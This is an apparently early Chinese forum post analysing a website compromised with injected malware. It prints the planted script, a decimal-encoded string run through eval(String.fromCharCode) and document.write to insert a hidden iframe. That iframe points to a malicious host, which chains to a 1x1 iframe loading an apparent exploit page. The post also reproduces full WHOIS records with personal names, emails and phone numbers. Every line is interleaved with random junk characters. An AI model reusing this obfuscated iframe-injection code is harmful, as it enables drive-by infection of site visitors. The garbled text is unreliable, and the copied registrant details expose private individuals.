[原创]一篇刚写的分析木马手记

首发在我的博客里面， 8.A; I<  
> h:~*g  
http://www.areway.cn/?p=175 4b<:67 %  
b0&dpMgh:  
?}Mv
5SO  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： 20Rgw  
          ,qr)}s-  
<script>t=’60,105,102,114,97,109,101, iE&`Fhf?  
32,115,114,99,61,104,116,116,112,58,47,47, M1oCa,8M+  
102,114,101,101,46,117,45,117,117,117,46,99, 9wAP%xh  
110,47,101,114,114,111,114,46,104,116,109, T8RQM1D_s  
32,119,105,100,116,104,61,49,48,48,32,104, 9^}GUJy?  
101,105,103,104,116,61,48,62,60,47,105,102, GEvif4  
114,97,109,101,62′; +^"|FtKhE  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> VWNmqeP  
                                                                                                  E@N
_~1  
<script>t=’60,105,102,114,97,109,101,32,115, V&f3>#n\  
114,99,61,104,116,116,112,58,47,47,102,114, yC _X@o-n  
101,101,46,117,45,117,117,117,46,99,110,47, Fs=nAn#  
101,114,114,111,114,46,104,116,109,32,119, IYj-cm  
105,100,116,104,61,49,48,48,32,104,101,105, [` i;gx[^  
103,104,116,61,48,62,60,47,105,102,114,97, [}VEDx
 
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); )@sz\yI%U  
document.write(t);</script> +V0uHpm  
                                                                                                  fa!iQfr  
<html xmlns=” gmM79^CEF  
http://www.w3.org/1999/xhtml +XIN
-8  
“> !G8SEWP  
<head> 0_j!t  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> Yt{Y)=_t  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> 5ax/jd~}  
<title>首页 - 爱生活家庭网 v8WoV*  
                                                                                                                                                    T0Gu(c`1d  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 *=ALns?y  
转换字符串后的大概内容是（谁点击后果自付）： apYf,"|9  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… N(IUNL  
                                                                                                                                  irL ehPX9  
查询玉米u-uuu.cn的详细信息： iKdC2m  
Domain Name: u-uuu.cn Cx@,J\rsQ  
ROID: 20070901s10001s64972306-cn 'DKP-R"  
Domain Status: ok {j(,Q qB;f  
Registrant Organization: 王雷 L>PpXTWwy  
Registrant Name: 王雷 gfp#G,/B  
Administrative Email: czlovexs@126.com p2cKtk+  
Sponsoring Registrar: 北京万网志成科技有限公司 i,V~5dE[I<  
Name Server:ns.yovole.com :0vNg:u+  
Name Server:ns1.yovole.com . Bv;Zv  
Registration Date: 2007-09-01 17:54 jgC/  
Expiration Date: 2008-09-01 17:54 J M`uIVnNA  
最后PING了一下地址 都没有什么…. uL1-@D,  
                                                                                                D!y Cnq=8  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. ]~|zY5i!  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> `zTVup&  
<script language=”javascript” src=” [g%oo3`A  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script w1.KRe{M  
> 5jbd!t@L  
这个玉米应该有可能是木马作者的： |D<~a(0  
foafau.info的详细信息： xvW+;3;  
Access to INFO WHOIS information is provided to assist persons in '\\J95*`  
determining the contents of a domain name registration record in the 0Uybh.dC  
Afilias registry database. The data in this record is provided by ty
"k  
Afilias Limited for informational purposes only, and Afilias does not .lj\H  
guarantee its accuracy.  This service is intended only for query-based UZXnABg,J  
access. You agree that you will use this data only for lawful purposes {o;J'yjre1  
and that, under no circumstances will you use this data to: (a) allow, |KkVt]ZQe9  
enable, or otherwise support the transmission by e-mail, telephone, or 4sG^bZ,  
facsimile of mass unsolicited, commercial advertising or solicitations Dzp9BRS 2f  
to entities other than the data recipient’s own existing customers; or  9((v.  
(b) enable high volume, automated, electronic processes that send
Hm*n,8_  
queries or data to the systems of Registry Operator, a Registrar, or +nZx{d,wt  
Afilias except as reasonably necessary to register domain names or :vm*miOF  
modify existing registrations. All rights reserved. Afilias reserves *O+N4tq  
the right to modify these terms at any time. By submitting this query, :r!nz\%WW  
you agree to abide by this policy. xro  
Domain ID:D22418703-LRMS 7$/ O{GBJ  
Domain Name:FOAFAU.INFO k%.IIVRx  
Created On:20-Nov-2007 16:05:42 UTC 2N>:GwN  
Last Updated On:20-Nov-2007 16:05:44 UTC !$fBo3!B_8  
Expiration Date:20-Nov-2008 16:05:42 UTC j'v2m
6/  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) xeZ,}YP)  
Status:CLIENT DELETE PROHIBITED wG-X833\(  
Status:CLIENT RENEW PROHIBITED zg"
<N  
Status:CLIENT TRANSFER PROHIBITED 2pZ|+!xc+  
Status:CLIENT UPDATE PROHIBITED ^[5yff 4  
Status:TRANSFER PROHIBITED ]"F0"UH,  
Registrant ID:GODA-040110615 ( vgoG5  
Registrant Name:liu hong BE:GB?XBH  
Registrant Organization: $n>.;CV  
Registrant Street1:beijing 8+lM6O ~!  
Registrant Street2: qy.Mi{=~:  
Registrant Street3: s%I)+|  
Registrant City:beijing M$|^?U>cm  
Registrant State/Province: #lF8"@)a-$  
Registrant Postal Code:100000 o-49o5:1  
Registrant Country:CN ?7(`2=J  
Registrant Phone:+86.860108888777 m~%IHWO'  
Registrant Phone Ext.: {PdyKgM  
Registrant FAX: J
6=*F;x6E  
Registrant FAX Ext.: iN=-N=  
Registrant Email:bbbshiji@163.com N^:)U"9*e  
Admin ID:GODA-240110615 }Vk#w%EJ  
Admin Name:liu hong cO_En`F  
Admin Organization: 29}(l#S}m  
Admin Street1:beijing sJMT _yt;  
Admin Street2: ]iYjS  
Admin Street3: Pij*?qmeQ  
Admin City:beijing qm]k (/w  
Admin State/Province: Y}ITA=L7  
Admin Postal Code:100000 IJ[#$I+Z%  
Admin Country:CN z[[|'02{  
Admin Phone:+86.860108888777 F"~uu9u  
Admin Phone Ext.: ?!cUAa>iH  
Admin FAX: qVE6ROSh  
Admin FAX Ext.: P**h\+M>{  
Admin Email:bbbshiji@163.com I6zKvP8pb  
Billing ID:GODA-340110615 F0])g  
Billing Name:liu hong wwk=*X-8  
Billing Organization: \za 0?b  
Billing Street1:beijing ]qvrpI!E!  
Billing Street2: .kyp5CD}4  
Billing Street3: 'IKV%$k  
Billing City:beijing "0pu_  
Billing State/Province: IL*C/y  
Billing Postal Code:100000 SfEgmp-m  
Billing Country:CN %h(J+_"L6  
Billing Phone:+86.860108888777 wtIXZUx  
Billing Phone Ext.: AEp|#H' >  
Billing FAX: ~#pQWa5  
Billing FAX Ext.: 5Ta<$t  
Billing Email:bbbshiji@163.com r3{Cuz  
Tech ID:GODA-140110615 =c[9:&5Q  
Tech Name:liu hong Gdb6 U{  
Tech Organization: {f<2VeJ  
Tech Street1:beijing Fe{lM' 8  
Tech Street2: Me_.X_  
Tech Street3: OXT 5 y)   
Tech City:beijing Hj2E-RwG  
Tech State/Province: s<h]2W  
Tech Postal Code:100000 3E) X(WJY  
Tech Country:CN criOJ-  
Tech Phone:+86.860108888777 luY#l!mx3  
Tech Phone Ext.: <y7nGXzLK  
Tech FAX: aHuZzYQ*"j  
Tech FAX Ext.: bXmX@A$#Io  
Tech Email:bbbshiji@163.com 33:{IV;k  
Name Server:NS27.DOMAINCONTROL.COM g\ilK:r}  
Name Server:NS28.DOMAINCONTROL.COM Gx,<|v  
Name Server: 4l_!OUvt  
Name Server: )7f;FWI  
Name Server: F-D9nI
4{X  
Name Server:  At3>  
Name Server: `O/1aW1  
Name Server: 4,4S5u[|  
Name Server: 0go{gUI  
Name Server: @Fvp~]jCb  
Name Server: ] -iMo4H  
Name Server: CC"}aV5  
Name Server: 9kZ[Z ,=>  
                                                                                                          EhB0w;c  
接着下载每个文件里面的代码： <$metN~9j  
一步一步看.. Y=6569U2  
`#Z=cq^_  
9EHhVi  
g3B%}!|  
zZR_&z<  
pL2P .  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来